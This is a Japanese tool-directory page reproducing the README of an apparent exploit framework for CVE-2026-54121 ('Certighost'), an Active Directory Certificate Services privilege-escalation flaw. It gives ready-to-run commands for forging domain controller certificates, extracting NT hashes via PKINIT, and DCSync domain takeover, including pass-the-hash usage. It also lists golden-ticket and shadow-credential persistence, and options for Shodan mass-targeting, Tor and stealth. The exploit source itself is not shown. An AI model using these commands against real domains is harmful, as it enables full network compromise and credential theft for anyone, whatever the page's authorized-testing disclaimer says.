Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-54121-PoC-Exploit — 👻 CVE-2026-54121 - 最高のCertiGhost AD CS Multi-Exploit Framework | 不正なDC/LDAPサーバー、証明書の悪用、PKINITハッシュ抽出を備えた高度なツールキット。特徴: 検出(安全チェック)、完全なマルチスレッドエクスプロイト。🛡️ CVSS 8.8 高 - 倫理的に使用し、法律を遵守してください。🔒 | Kitploit
ツール/GitHubGitHub/tc4dy/cve-2026-54121-poc-exploit
認証と認可ペネトレーションテストフレームワーク特権昇格エクスプロイトフレームワークエクスプロイト横移動ポストエクスプロイトペイロード開発

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
tc4dy/cve-2026-54121-poc-exploit

CVE-2026-54121-PoC-Exploit

👻 CVE-2026-54121 - 最高のCertiGhost AD CS Multi-Exploit Framework | 不正なDC/LDAPサーバー、証明書の悪用、PKINITハッシュ抽出を備えた高度なツールキット。特徴: 検出(安全チェック)、完全なマルチスレッドエクスプロイト。🛡️ CVSS 8.8 高 - 倫理的に使用し、法律を遵守してください。🔒

リポジトリを見る
27641ヶ月前Kitploit レビュー済み

CVE-2026-54121

CVE-2026-54121 - AD CS「Certighost」権限昇格フレームワーク・ツールキット

CVE-2026-54121 CVSS 8.8 Python 3.6+

Privilege Escalation Identity Impersonation Domain Admin

Active Directory証明書サービス — Certighost → ドメイン乗っ取り

エクスプロイトフレームワーク&監査ツールキット
許可されたセキュリティテスト専用です。

---

⚖️ 法的免責事項と責任ある使用

このツールは、教育および許可されたペネトレーションテストの目的でのみ提供されています。 著者および貢献者は、このソフトウェアの誤用またはそれによって引き起こされた損害について一切責任を負いません。ユーザーは、テスト前にターゲット所有者から明示的な書面による許可を得ていることを確認する単独の責任を負います。コンピューターシステムへの不正アクセスは、該当する連邦法、州法、および国際的なサイバー犯罪法の下で違法です。

本ソフトウェアを使用することにより、あなたは以下に同意したものとみなされます:

  • 自分の所有するシステム、またはテストする明示的な許可を得たシステムでのみ使用すること。
  • 該当するすべての現地法、州法、および連邦法を遵守すること。
  • 悪意のある、破壊的な、または違法な活動に使用しないこと。

⚠️ 警告: Active Directoryの権限昇格の脆弱性は、エンタープライズインフラストラクチャに高いリスクをもたらします。許可のないテストは固く禁止されています。


[+!] 脆弱性の概要

CVE-2026-54121(**「Certighost」と呼ばれる)は、Microsoft Active Directory証明書サービス(AD CS)における権限昇格(EoP)**脆弱性です。低権限のドメインユーザーがドメインコントローラーのマシンアカウントになりすまし、証明書偽造を介して完全なドメイン管理者乗っ取りを達成できるようにします。

仕組み:

  1. ターゲット検証バイパス: この脆弱性は、AD CSが証明書リクエストのターゲットパラメータを処理する際の不適切な認可チェック(CWE-285)に起因します。
  2. 不正サーバーリダイレクション: 認証局(CA)は、ターゲットが認可されたドメインコントローラーであるかどうかを検証せずに、クライアントが提供したサーバーリダイレクションターゲットを受け入れます。
  3. ドメインコントローラーのなりすまし: CAは攻撃者が制御するサーバーに対してクエリを実行し、特権ドメインコントローラーのIDで署名された有効なコンピューター証明書を発行します。
  4. ドメイン乗っ取り(DCSync): 偽造したDC証明書を使用して、攻撃者はKerberos/PKINIT経由で認証し、ドメインコントローラー権限を取得してDCSync操作を実行します。

主な要点:

警告! 🌬️

このコードはユーザーフレンドリーなアプローチを念頭に置いて作成されており、セキュリティ、プライバシー、および最小限のロギングを優先した完全に機能するコードです。Shodan統合とライブラリを完全に削除し、スレッドプールの代わりに単一スレッドを使用し、ポートスキャンとdetect_ipを削除し、ロギングと出力を無効にすることをお勧めします。このバージョンでは**「stealthcert.py」**を使用してください。

CVE-2026-54121 CertiGhost - パラメータリファレンス


📋 完全なパラメータ一覧

Pythonエクスプロイトパラメータ


stealthcare.py(安全なエクスプロイト)


PowerShellラッパーパラメータ

🚀 使用例

root@kitploit:~
git clone https://tc4dy/CVE-2026-54121-PoC-Exploit
#install requirements

使用例 ❄️

root@kitploit:~
# Auto-discovers CA via LDAP, creates temp computer, spawns rogue servers, requests certificate with cdc redirect, extracts DC's NT hash via PKINIT, enables DCSync for domain takeover
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10

# Impersonates a specific Domain Controller (DC01$). Useful when you know exactly which DC to target. Bypasses auto-discovery
python3 certighost.py -d corp.local -u user -p Passw0rd --dc-ip 10.0.0.1 --target-san DC01$

# Uses NTLM hash instead of password. Works when password is unknown but hash is obtained. ':' before hash = empty LM hash
python3 certighost.py -d domain.local -u admin --hashes :8846f7eaee8fb117ad06bdd830b7586c --dc-ip 192.168.1.10

# Bypasses LDAP CA discovery. Uses explicitly provided CA IP and name. Useful when LDAP is restricted or CA is on different subnet
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10 --ca-ip 192.168.1.20 --ca "PLAYGROUND-CA"

PowerShell(検出)

root@kitploit:~
# Native LDAP query to check if AD CS is present. Returns CA name and DNS. Read-only, safe for production. No exploitation performed
.\CertiGhost.ps1 -d playground.local --dc-ip 192.168.1.10 --username lowpriv -p Password123 --detect

Pythonバックエンドのエクスプロイト

root@kitploit:~
# Runs native AD CS detection then calls Python certighost.py with all parameters. Requires certighost.py in same directory. Prints NT hash and ccache file
.\CertiGhost.ps1 -d corp.local --dc-ip 10.0.0.1 --username attacker -p P@ssw0rd --exploit --target-account DC01$

JSON保存、検出モード

root@kitploit:~
#Detection only mode. Saves results in JSON format. Useful for automation, reporting, and integration with other security tools
.\CertiGhost.ps1 -d domain.local --dc-ip 192.168.1.10 --username user -p pass --detect -o results.json

🧠 技術的な詳細

1. AD CSターゲット検証バイパス(Certighost)

この脆弱性は、Active Directory証明書サービス(AD CS)の証明書登録プロセスにおける不適切な認可および検証チェック(CWE-285)に起因します。低権限のドメイン資格情報を持つ攻撃者は、ターゲットリダイレクションパラメータを操作して、認証局(CA)に不正なエンドポイントに対してID検証を実行させることができます。

脆弱なエンドポイント/リクエストコンテキスト:

root@kitploit:~
POST /certsrv/mscep/mscep.dll HTTP/1.1
Host: ca-server.domain.local
Content-Type: application/x-www-form-urlencoded

... (Certificate Request payload with manipulated target/cdc parameters)

2. 攻撃ベクトル

  • チェースターゲット操作: 攻撃者は証明書リクエスト内のターゲットリダイレクションパラメータ(cdc / チェースターゲットなど)を改ざんし、認証局(CA)に検証トラフィックを指定したエンドポイントへルーティングさせます。

  • 不正サーバーリダイレクション: 認証局(CA)は、ターゲットが正当かつ認可されたドメインコントローラーであるかどうかを検証せずに、クライアントが指定した宛先へのLDAPまたはSMB接続を開始します。

  • DC ID偽造と証明書発行: 攻撃者が制御する不正サーバーは、CAが対象のドメインコントローラーアカウントに代わって発行した検証クエリに応答します。この応答に基づき、CAはドメインコントローラーのIDを持つ有効な署名済み証明書を発行します。


3. ポストエクスプロイテーション

チケット発行チケット(TGT)の取得

取得したドメインコントローラー証明書を使用して、PKINIT(Public Key Cryptography for Initial Authentication)経由でKerberos認証を実行し、高権限のTGTを取得します。

DCSync攻撃

ドメインコントローラー権限を持つKerberosチケットを使用して、Active Directoryデータベース内の全アカウント(例: krbtgt、Administrator)のパスワードハッシュがDCSyncテクニックを使用して抽出されます。

永続化

  • ゴールデンチケットの作成: 抽出したkrbtgtアカウントのパスワードハッシュを使用して、オンデマンドでTGTを偽造します。
  • シャドウ資格情報: 対象アカウントのmsDS-KeyCredentialLink属性に不正な証明書キーを追加し、永続的なアクセスを確保します。
  • 証明書テンプレートの操作: 将来の権限昇格を可能にするバックドア構成を維持するため、AD CSテンプレートの権限を変更します。

横展開(ラテラルムーブメント)

  • ドメイン掌握: ドメイン内のすべてのサーバーとワークステーションにわたって、完全な権限(SYSTEM / ドメイン管理者)のセッションを確立します。
  • クロスフォレストピボット: SID HistoryまたはTGT委任テクニックを使用して、信頼関係にあるドメイン(フォレスト信頼)への侵入を達成します。

📚 参照

  • NVD - CVE-2026-54121
  • Microsoft Security Update Guide - CVE-2026-54121
  • CERT/CC Vulnerability Note
  • MITRE ATT&CK - T1649: Steal or Forge Authentication Certificates

🔗 その他のエクスプロイト

  • CVE-2026-15409/15410 - SonicWall SMA1000 マルチエクスプロイトフレームワーク
  • CVE-2026-6875 - ServiceNow 事前認証RCEエクスプロイトフレームワーク
  • CVE-2026-41091 - SolarFlare(RedSun)Microsoft Defender LPE
  • CVE-2026-57821 - Apache Fineract SQLインジェクションツールキット
  • CVE-2026-41940 - cPanel/WHM 認証バイパス
ツールをダウンロード
属性値
📅 発見/パッチ適用2026年7月(Microsoftパッチチューズデー)
⚠️ CVSSスコア8.8(高)
🏷️ コードネームCertighost
🎯 影響を受ける製品Microsoft Active Directory証明書サービス
🔄 修正バージョン2026年7月セキュリティ更新プログラム
🔓 認証低権限ドメインアカウント
🌍 影響Active Directoryドメイン全体の侵害
パラメータ説明例
-d, --domainターゲットドメインのDNS名(必須)-d playground.local
-u, --username低権限ドメインユーザー(必須)-u lowpriv
-p, --passwordユーザーパスワード-p Password123
-H, --hashesNTLMハッシュ [LM:]NT-H :8846f7eaee8fb117ad06bdd830b7586c
--dc-ipドメインコントローラーIP(必須)--dc-ip 192.168.1.10
--ca-ip認証局(CA)IP(オプション)--ca-ip 192.168.1.20
--caCA名(未設定の場合は自動検出)--ca "PLAYGROUND-CA"
--listener不正サーバー用の攻撃者IP--listener 192.168.1.100
--target-sanなりすまし対象のコンピューターアカウント(例: DC01$)--target-san DC01$
--template証明書テンプレート(デフォルト: Machine)--template Machine
--computer-name既存のコンピューターアカウント名($付き)--computer-name GHOSTABCD$
--computer-pass既存のコンピューターパスワード--computer-pass CGabc123...
--computer-hash既存のコンピューターNTハッシュ--computer-hash 8846f7ea...
--use-ldapLDAPS(636)の代わりにLDAP(389)を使用--use-ldap
--exploitエクスプロイトを実行--exploit
--detect検出のみ(エクスプロイトなし)--detect
-t, --threads一括スキャンの最大スレッド数-t 10
--timeoutリクエストごとのタイムアウト(秒)--timeout 10
--retry失敗時のリトライ回数--retry 3
--delayリクエスト間の基本遅延--delay 1.0
--proxyプロキシURL--proxy http://127.0.0.1:8080
--no-verifySSL検証を無効化--no-verify
--torTorプロキシを使用(socks5h://127.0.0.1:9050)--tor
-o, --output出力ファイル(.json、.csv、.jsonl)-o results.json
-v, --verbose詳細出力-v
-q, --quietクワイエットモード-q
-h, --helpヘルプを表示-h
パラメータ説明例
-t, --targetターゲットCAのIPまたはホスト名(必須)-t 192.168.1.20
-d, --domainターゲットドメインのDNS名(必須)-d playground.local
--dc-ipドメインコントローラーIP(必須)--dc-ip 192.168.1.10
-u, --username低権限ドメインユーザー(必須)-u lowpriv
-p, --passwordユーザーパスワード-p Password123
-H, --hashesNTLMハッシュ [LM:]NT-H :8846f7eaee8fb117ad06bdd830b7586c
--computer-name既存のコンピューターアカウント名($付き)--computer-name GHOSTABCD$
--computer-pass既存のコンピューターパスワード--computer-pass CGabc123...
--computer-hash既存のコンピューターNTハッシュ--computer-hash 8846f7ea...
--target-accountなりすまし対象のアカウント(例: DC01$)--target-account DC01$
--template証明書テンプレート(デフォルト: Machine)--template Machine
--listener不正サーバー用の攻撃者IP(未設定の場合は自動検出)--listener 192.168.1.100
--use-ldapLDAPS(636)の代わりにLDAP(389)を使用--use-ldap
--keep-files.pfxおよび.ccacheファイルを保持(デフォルト: 削除)--keep-files
-h, --helpヘルプを表示-h
パラメータ説明例
-u, --urlターゲットCAのIPまたはホスト名-u 192.168.1.20
-l, --listターゲットを含むファイル(1行に1つ)-l targets.txt
--shodanShodanからターゲットを読み込む--shodan
--shodan-queryShodan検索クエリ--shodan-query "AD CS Certificate"
-d, --domainターゲットドメインのDNS名(必須)-d playground.local
--dc-ipドメインコントローラーIP(必須)--dc-ip 192.168.1.10
--username低権限ドメインユーザー(必須)--username lowpriv
-p, --passwordユーザーパスワード-p Password123
-H, --hashesNTLMハッシュ [LM:]NT-H :8846f7ea...
--computer-name既存のコンピューターアカウント名($付き)--computer-name GHOSTABCD$
--computer-pass既存のコンピューターパスワード--computer-pass CGabc123...
--computer-hash既存のコンピューターNTハッシュ--computer-hash 8846f7ea...
--target-accountなりすまし対象のアカウント(例: DC01$)--target-account DC01$
--template証明書テンプレート(デフォルト: Machine)--template Machine
--listener不正サーバー用の攻撃者IP--listener 192.168.1.100
--use-ldapLDAPS(636)の代わりにLDAP(389)を使用--use-ldap
--exploitエクスプロイトを実行--exploit
--detect検出のみ(エクスプロイトなし)--detect
-t, --threads一括スキャンの最大スレッド数-t 10
--timeoutリクエストごとのタイムアウト(秒)--timeout 10
--retry失敗時のリトライ回数--retry 3
--delayリクエスト間の基本遅延--delay 1.0
--proxyプロキシURL--proxy http://127.0.0.1:8080
--no-verifySSL検証を無効化--no-verify
--torTorプロキシを使用--tor
-o, --output出力ファイル(.json、.csv、.jsonl)-o results.json
-v, --verbose詳細出力-v
-q, --quietクワイエットモード-q
-h, --helpヘルプを表示-h